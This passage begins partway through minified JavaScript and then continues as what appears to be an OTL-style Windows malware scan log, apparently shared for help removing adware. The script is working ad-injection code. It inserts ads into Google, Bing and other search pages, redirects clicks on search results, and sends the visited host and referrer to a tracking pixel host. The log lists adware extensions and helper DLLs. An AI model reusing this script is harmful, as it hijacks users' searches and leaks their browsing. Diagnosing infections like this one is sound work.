g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof 
window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less= function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof 
RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\", \"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=3690070418775238836&eid=727&pid=0&prodid=185&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=AU&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\", \"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0; if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\");if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return 
b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"], urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/...rc_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.condui...:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}}, ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/w...rc_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple...idate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\"); if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.in...idate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"], src_for_keyword:\"#searchboxinput\",tweak:function(){var 
a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()}, !1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.co...d-keywords=*\"], src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&& 1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof 
f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b, d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom= new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&& (c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault? 
a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f< d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\", \"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json= function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts 
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.17.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@abr.gov.au/KeyMgmtPlugin: C:\Program Files (x86)\ABR\Plug-In\bin\npAUSkeyPlugin.dll (Commonwealth Government of Australia)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.65.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.65.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3508.0205: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@citrixonline.com/appdetectorplugin: C:\Users\Mitey Fresh\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]\ [2014/09/30 17:07:04 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected] [2014/10/01 14:52:22 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
 
[2013/10/05 13:03:05 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Extensions
[2014/10/01 14:52:23 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions
[2014/10/01 14:52:22 | 000,000,000 | ---D | M] ("Fast Start") -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]
[2014/02/19 15:57:47 | 000,000,000 | ---D | M] (UTubErAdBllockEr) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]
[2014/09/13 12:29:01 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\staged
[2014/03/24 13:31:39 | 000,000,000 | ---D | M] (RooboSaver) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]
[2014/06/05 12:10:08 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/04/19 13:26:24 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2014/09/30 17:07:04 | 000,000,000 | ---D | M] (iSkysoft Video Converter Ultimate) -- C:\PROGRAMDATA\ISKYSOFT\VIDEO CONVERTER ULTIMATE\[email protected]
File not found (No name found) -- C:\USERS\MITEY FRESH\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\OW597PNN.DEFAULT\EXTENSIONS\[email protected]C2592D0DF.COM
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - plugin: Error reading preferences file
CHR - Extension: SEOquake = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc\1.0.21_0\
CHR - Extension: Google Docs = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\
CHR - Extension: Google Drive = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Reddit Enhancement Suite = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb\4.3.2.1_0\
CHR - Extension: Google Wallet = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_1\
CHR - Extension: Gmail = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
 
O1 HOSTS File: ([2009/06/11 08:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:64bit: - BHO: (Reg Error: Value error.) - {25880CCB-24B8-785F-89B4-3DDCE851F8CF} - C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.x64.dll File not found
O2:64bit: - BHO: (RooboSaver) - {65716D5D-F3D7-C35B-7F16-25F69BF58395} - C:\ProgramData\RooboSaver\9BLj9uIzS.x64.dll File not found
O2 - BHO: (UTubErAdBllockEr) - {25880CCB-24B8-785F-89B4-3DDCE851F8CF} - C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.dll File not found
O2 - BHO: (RooboSaver) - {65716D5D-F3D7-C35B-7F16-25F69BF58395} - C:\ProgramData\RooboSaver\9BLj9uIzS.dll File not found
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (iSkysoft Video Converter Ultimate 5.1.0) - {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} - C:\ProgramData\iSkysoft\Video Converter Ultimate\WSBrowserAppMgr.dll (Wondershare)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4:64bit: - HKLM..\Run: [FAHConsole] C:\Program Files\File Association Helper\FAHConsole.exe (Nico Mak Computing)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKCU..\Run: [Spotify Web Helper] C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe (Spotify Ltd)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O13:64bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{50EF78CE-304E-4B7A-9AAB-DDBCC5200660}: DhcpNameServer = 192.168.0.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{910DEC28-ADB7-41E8-A772-D1D261B4EC8C}: DhcpNameServer = 192.168.1.1 192.168.1.1
O18:64bit: - Protocol\Handler\msdaipp - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
O18:64bit: - Protocol\Handler\msdaipp\oledb - No CLSID value found
O18:64bit: - Protocol\Handler\mso-offdap - No CLSID value found
O18:64bit: - Protocol\Handler\mso-offdap11 - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18:64bit: - Protocol\Handler\WSISVCUchrome - No CLSID value found
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\WSISVCUchrome - No CLSID value found
O18:64bit: - Protocol\Filter\text/xml - No CLSID value found
O20:64bit: - AppInit_DLLs: (C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL) -  File not found
O20 - AppInit_DLLs: (c:\progra~3\fastan~1\fastan~1.dll) -  File not found
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{496991f1-83b7-11e3-a045-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{496991f1-83b7-11e3-a045-406186b70622}\Shell\AutoRun\command - "" = H:\autorun.exe
O33 - MountPoints2\{6140cd31-99d4-11e3-ac34-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{6140cd31-99d4-11e3-ac34-406186b70622}\Shell\AutoRun\command - "" = F:\HTC_Sync_Manager_PC.exe
O33 - MountPoints2\{efd7f59c-3f87-11e4-aca2-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{efd7f59c-3f87-11e4-aca2-406186b70622}\Shell\AutoRun\command - "" = F:\Startme.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/10/01 14:54:32 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\SupTab
[2014/10/01 14:52:30 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
[2014/10/01 14:51:50 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
[2014/10/01 14:51:45 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Local\WinZip
[2014/10/01 14:51:08 | 000,000,000 | ---D | C] -- C:\ProgramData\WinZip
[2014/10/01 14:50:58 | 000,000,000 | ---D | C] -- C:\Program Files\WinZip
[2014/09/30 17:15:15 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\Desktop\Mitey Shield video
[2014/09/30 17:07:43 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
[2014/09/30 17:07:40 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\Documents\iSkysoft Video Converter Ultimate
[2014/09/30 17:07:24 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Local\iSkysoft
[2014/09/30 17:07:18 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\iSkysoft
[2014/09/30 17:07:06 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
[2014/09/30 17:06:27 | 000,000,000 | ---D | C] -- C:\ProgramData\iSkysoft Video Converter Ultimate
[2014/09/30 17:06:15 | 000,000,000 | ---D | C] -- C:\ProgramData\iSkysoft
[2014/09/30 17:06:15 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\iSkysoft
[2014/09/30 17:05:20 | 000,000,000 | ---D | C] -- C:\Users\Public\Documents\iSkysoft
[2014/09/22 18:48:09 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\vlc
[2014/09/22 18:46:55 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\VLC
[2014/09/17 09:22:29 | 000,000,000 | ---D | C] -- C:\ProgramData\Browser AdBlocker
 
========== Files - Modified Within 30 Days ==========
 
[2014/10/14 16:28:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/10/14 16:15:00 | 000,000,908 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/10/14 16:09:00 | 000,000,598 | ---- | M] () -- C:\Windows\tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job
[2014/10/14 15:15:00 | 000,000,904 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/10/14 06:55:03 | 000,024,048 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
